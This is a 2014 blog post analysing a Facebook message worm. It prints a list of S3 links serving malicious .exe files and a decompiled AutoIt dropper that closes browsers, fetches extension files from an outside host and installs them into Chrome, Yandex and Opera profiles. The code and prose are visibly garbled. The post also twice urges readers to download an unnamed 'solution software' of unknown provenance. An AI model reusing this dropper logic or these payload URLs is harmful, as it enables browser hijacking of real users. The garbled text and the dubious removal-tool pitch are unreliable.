Huwebes, Hulyo 31, 2014

Facebook Virus [Oh my god. This video Belongs to you? you special video link]

Check to see it creep into web browser but does not run independently. 
Symptoms: it blocks the item Extensions in Chrome. (Just open the materials tab is disabled) 
Chrome opens up very slowly (because it must run the application it) 
Download the Solution Software  here:----> DOWNLOAD LINK




Analysis of the malware infection on Facebook 



- Phenomenon: 
1 Private Message to Friends list on Facebook, with a link contents. 
2 When you click on this link to download EXE files on your computer. 
3 When the file is finished running, the computer will be infected and continue to send. 

Links in the following format (note: For only, do not click on the link offline) 


Message to the avatar of the person would have received. 

Code: 

exeler var = [ 
"https://s3-us-west-2.amazonaws.com/yeslanw232323sdsdsd2sds13/video_watching_mp4_facebook_12222333232122233sd290 00421003.exe " 
"Https://s3-us-west-2.amazonaws.com/sadask2323s/video_watching_mp4_facebook_1222233323212233sd2900 0421003.exe" 
"Https://s3-us-west-2.amazonaws.com/sadsak2k323s/video_watching_mp4_facebook_122223332322233sd29000 42003.exe" 
"https://s3-us-west-2.amazonaws.com/sadsadk21k323s/video_watching_mp4_facebook_1222323222332900042003exe " 
"Https://s3-us-west-2.amazonaws.com/bakbakbak323/video_watching_mp4_facebook_122223332322233sd29000 421003.exe" 
"Https://s3-us-west-2.amazonaws.com/sadsad21323ss/video_watching_mp4_facebook_133290004003.exe" 
"Https://s3-us-west-2.amazonaws.com/sdskdk213s/video_watching_mp4_facebook_12233290004003.exe" 
"Https://s3-us-west-2.amazonaws.com/bakbakwsd21323/video_watching_mp4_facebook_122332900042003.exe" 
"Https://s3-us-west-2.amazonaws.com/23sds123s/video_watching_mp4_facebook_12222332900042003.exe"]; 
var exem = exeler [Math.floor (Math.random () * (exeler.length))];
So, is it an automatic download of a file on the computer, who will execute automatically install it on your computer. Currently, I have met at least 2 samples of this kind of infection on your computer. This malware is written in AutoIt. Reverse we get: 

Code: 
Local $ chrxxxx1 = "C" 
Local $ chrxxxx2 = "h" 
Local $ chrxxxx3 = "r" 
Local $ chrxxxx4 = "o" 
Local $ chrxxxx5 = "m" 
Local $ chrxxxx6 = "f" 
Local chrxxxx1 $ chrxxxx = $ & $ & $ chrxxxx2 chrxxxx4 chrxxxx3 & $ & $ & $ chrxxxx5 chrxxxx6 
Local $ browxs1 = "b" 
Local $ browxs2 = "r" 
Local $ browxs3 = "o" 
Local $ browxs4 = "w" 
Local $ browxs5 = "s" 
Local $ browxs6 = "f" 
Local $ browxs7 = "r" 
Local browxs1 $ browxs = $ & $ & $ browxs2 browxs4 browxs3 & $ & $ & $ browxs5 browxs6 & $ browxs7 
Local $ extsd1 = "E" 
Local $ extsd2 = "x" 
Local $ extsd3 = "t" 
Local $ extsd4 = "f" 
Local $ extsd5 = "n" 
Local $ extsd6 = "s" 
Local $ extsd7 = "i" 
Local $ extsd8 = "o" 
Local $ extsd9 = "n" 
Local $ extsd0 = "s" 
Local extsd1 $ extsd = $ & $ & $ extsd2 extsd4 extsd3 & $ & $ & $ extsd5 extsd7 extsd6 & $ & $ & $ extsd8 extsd9 & $ extsd0 
If ProcessExists ("" & $ chrxxxx & "exe") Then 
ProcessClose ("" & $ chrxxxx & "exe") 
Endif 
If ProcessExists ("" & $ browxs & "exe") Then 
ProcessClose ("" & $ browxs & "exe") 
Endif 
If ProcessExists ("opera.exe") Then 
ProcessClose ("opera.exe") 
Endif 
Sleep (100) 
Local $ okanid = BinaryToString (InetRead ("http://www.patronbayi.com/class.php?idver=true")) 
DirCreate (UserProfileDir & "\ AppData \ Local \ Google \ '& $ chrxxxx &" \ User Data \ Default \ "& $ extsd &" \ "& $ okanid) 
DirCreate (UserProfileDir & "\ AppData \ Local \ Yandex \ YandexBrowser \ User Data \ Default \" & $ extsd & "\" & $ okanid) 
DirCreate (UserProfileDir & "\ AppData \ Roaming \ Opera Software \ Opera Stable \" & $ extsd & "\" & $ okanid) 
DirCreate ("C: \ Documents and Settings \" &UserName & "\ Local Settings \ Application Data \ Google \ '& $ chrxxxx &" \ User Data \ Default \ "& $ extsd &" \ "& $ okanid) 
DirCreate ("C: \ Documents and Settings \" &UserName & "\ Local Settings \ Application Data \ Yandex \ YandexBrowser \ User Data \ Default \" & $ extsd & "\" & $ okanid) 
DirCreate ("C: \ Documents and Settings \" &UserName & "\ Application Data \ Opera Software \ Opera Stable \" & $ extsd & "\" & $ okanid) 
DirCreate (UserProfileDir & "\ file_shared_xs \") 
Sleep (100) 
InetGet ("http://www.patronbayi.com/Preferences"UserProfileDir & "\ file_shared_xs \ Preferences", 9) 
Sleep (50) 
If NOT FileSetAttrib (UserProfileDir & "\ file_shared_xs \ Preferences", "+ R") Then 
Endif 
InetGet ("http://www.patronbayi.com/ext/background.js"UserProfileDir & "\ file_shared_xs \ background.js", 9) 
InetGet ("http://www.patronbayi.com/manifest.json"UserProfileDir & "\ file_shared_xs \ manifest.json", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ Preferences",UserProfileDir & "\ AppData \ Local \ Google \ '& $ chrxxxx &" \ User Data \ Default \ Preferences ", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ background.js"UserProfileDir & "\ AppData \ Local \ Google \ '& $ chrxxxx &" \ User Data \ Default \ "& $ extsd &" \ "& $ okanid &" \ background.js ", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ manifest.json"UserProfileDir & "\ AppData \ Local \ Google \ '& $ chrxxxx &" \ User Data \ Default \ "& $ extsd &" \ "& $ okanid &" \ manifest.json ", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ Preferences",UserProfileDir & "\ AppData \ Local \ Yandex \ YandexBrowser \ User Data \ Default \ Preferences", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ background.js"UserProfileDir & "\ AppData \ Local \ Yandex \ YandexBrowser \ User Data \ Default \" & $ extsd & "\" & $ okanid & "\ background.js" , 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ manifest.json"UserProfileDir & "\ AppData \ Local \ Yandex \ YandexBrowser \ User Data \ Default \" & $ extsd & "\" & $ okanid & "\ manifest.json" , 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ Preferences",UserProfileDir & "\ AppData \ Roaming \ Opera Software \ Opera Stable \ Preferences", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ background.js"UserProfileDir & "\ AppData \ Roaming \ Opera Software \ Opera Stable \" & $ extsd & "\" & $ okanid & "\ background.js", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ manifest.json"UserProfileDir & "\ AppData \ Roaming \ Opera Software \ Opera Stable \" & $ extsd & "\" & $ okanid & "\ manifest.json", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ Preferences", "C: \ Documents and Settings \" &UserName & "\ Local Settings \ Application Data \ Google \ '& $ chrxxxx &" \ User Data \ Default \ Preferences ", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ background.js", "C: \ Documents and Settings \" &UserName & "\ Local Settings \ Application Data \ Google \ '& $ chrxxxx &" \ User Data \ Default \ " & $ extsd & "\" & $ okanid & "\ background.js", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ manifest.json", "C: \ Documents and Settings \" &UserName & "\ Local Settings \ Application Data \ Google \ '& $ chrxxxx &" \ User Data \ Default \ " & $ extsd & "\" & $ okanid & "\ manifest.json", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ Preferences", "C: \ Documents and Settings \" &UserName & "\ Local Settings \ Application Data \ Yandex \ YandexBrowser \ User Data \ Default \ Preferences", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ background.js", "C: \ Documents and Settings \" &UserName & "\ Local Settings \ Application Data \ Yandex \ YandexBrowser \ User Data \ Default \" & $ extsd & " \ "& $ okanid &" \ background.js ", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ manifest.json", "C: \ Documents and Settings \" &UserName & "\ Local Settings \ Application Data \ Yandex \ YandexBrowser \ User Data \ Default \" & $ extsd & " \ "& $ okanid &" \ manifest.json ", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ Preferences", "C: \ Documents and Settings \" &UserName & "\ Application Data \ Opera Software \ Opera Stable \ Preferences", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ background.js", "C: \ Documents and Settings \" &UserName & "\ Application Data \ Opera Software \ Opera Stable \" & $ extsd & "\" & $ okanid & "\ background.js", 9) 
FileCopy (UserProfileDir & "\ file_shared_xs \ manifest.json", "C: \ Documents and Settings \" &UserName & "\ Application Data \ Opera Software \ Opera Stable \" & $ extsd & "\" & $ okanid & "\ manifest.json", 9) 
Sleep (100) 
ShellExecute ("" & $ chrxxxx & "exe")

 /class.php?idver=true HTTP GET / 1.1 
GET / Preferences HTTP / 1.1 
/ext/background.js HTTP GET / 1.1 
/manifest.json HTTP GET / 1.1


There are many places to save executable files are different, but I found two store locations are: 
Code: 

C: \ TEST \ sample.exe and 
% Appdata% sysreg.exe 
C: \ User \ [username] \ Program Data \ sysreg.exe 
C: \ f_install.exe
The EXE files you seach on and remove, then searching for the following folders: 
Code: 

C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Yandex \ YandexBrowser \ User Data \ Default \ Extensions 
C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Yandex \ YandexBrowser \ User Data \ Default 
C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Yandex \ YandexBrowser \ User Data 
C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Yandex \ YandexBrowser
C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Yandex 
C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Google \ Chrome \ User Data \ Default \ Extensions 
C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Google \ Chrome \ User Data \ Default 
C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Google \ Chrome \ User Data 
C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Google \ Chrome 
C: \ Documents and Settings \ User \ Local Settings \ Application Data \ Google 
C: \ Documents and Settings \ User \ file_shared_xs 
C: \ Documents and Settings \ User \ Application Data \ Opera Software \ Opera Stable \ Extensions 
C: \ Documents and Settings \ User \ Application Data \ Opera Software \ Opera Stable 
C: \ Documents and Settings \ User \ Application Data \ Opera Software 
C: \ Documents and Settings \ User \ AppData \ Roaming \ Opera Software \ Opera Stable \ Extensions 
C: \ Documents and Settings \ User \ AppData \ Roaming \ Opera Software \ Opera Stable 
C: \ Documents and Settings \ User \ AppData \ Roaming \ Opera Software 
C: \ Documents and Settings \ User \ AppData \ Roaming 
C: \ Documents and Settings \ User \ AppData \ Local \ Yandex \ YandexBrowser \ U ser Data \ Default \ Extensions 
C: \ Documents and Settings \ User \ AppData \ Local \ Yandex \ YandexBrowser \ U ser Data \ Default 
C: \ Documents and Settings \ User \ AppData \ Local \ Yandex \ YandexBrowser \ U ser Data 
C: \ Documents and Settings \ User \ AppData \ Local \ Yandex \ YandexBrowser 
C: \ Documents and Settings \ User \ AppData \ Local \ Yandex 
C: \ Documents and Settings \ User \ AppData \ Local \ Google \ Chrome \ User Data \ Default \ Extensions 
C: \ Documents and Settings \ User \ AppData \ Local \ Google \ Chrome \ User Data \ Default 
C: \ Documents and Settings \ User \ AppData \ Local \ Google \ Chrome \ User Data 
C: \ Documents and Settings \ User \ AppData \ Local \ Google \ Chrome 
C: \ Documents and Settings \ User \ AppData \ Local \ Google 
C: \ Documents and Settings \ User \ AppData \ Local 
C: \ Documents and Settings \ User \ AppData


I create the simple Program to Remove and Uninstall all installed Malware in your Desktop and Mobile.


Download the Solution Software  here:----> DOWNLOAD LINK
Ipinaskil ni sa
Mga etiketa: , , ,

Walang komento:

Mag-post ng isang Komento

Mag-subscribe sa: I-post ang Mga Komento (Atom)